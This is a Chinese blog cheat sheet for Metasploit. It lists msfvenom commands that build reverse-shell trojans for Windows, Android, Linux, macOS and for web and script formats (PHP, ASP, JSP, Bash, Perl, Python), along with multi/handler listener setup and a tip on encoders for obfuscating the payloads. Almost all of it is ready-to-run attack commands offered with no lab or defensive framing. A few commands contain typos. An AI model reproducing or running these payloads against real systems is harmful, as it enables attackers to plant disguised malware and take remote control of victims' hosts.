metasploit

metasploit

木马生成与监听

msfvenom -p windows/meterpreter/reverse_tcp -lhost=192.168.1.1 lport=4444 -f exe -o /tmp/shell.exe

//生成windows下的木马文件

use exploit/multi/handler   //所有类型木马监听都用handler模块
set lhost 192.168.1.1.
set port 4444
run

其他格式木马

安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk  
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f  elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f macho >  shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888  -f asp > shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888  -f  aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f  raw > shell.jsp
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.10.27 LPORT=8888 -f   raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.10.27 LPORT=8888 -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.10.27 LPORT=8888 -f   raw > shell.py

metasploit

发送生成的木马,进行监听

metasploit

采用命令控制目标主机

https://blog.csdn.net/qq_37865996/article/details/85855096 【msf 控制命令大全】

木马混淆

采用-e 参数后选择混淆类型

可以用 msfvenom -l encoders 查看

metasploit

上一篇:Reverse attention for salient object detection阅读笔记


下一篇:Leetcode 206:Reverse Linked List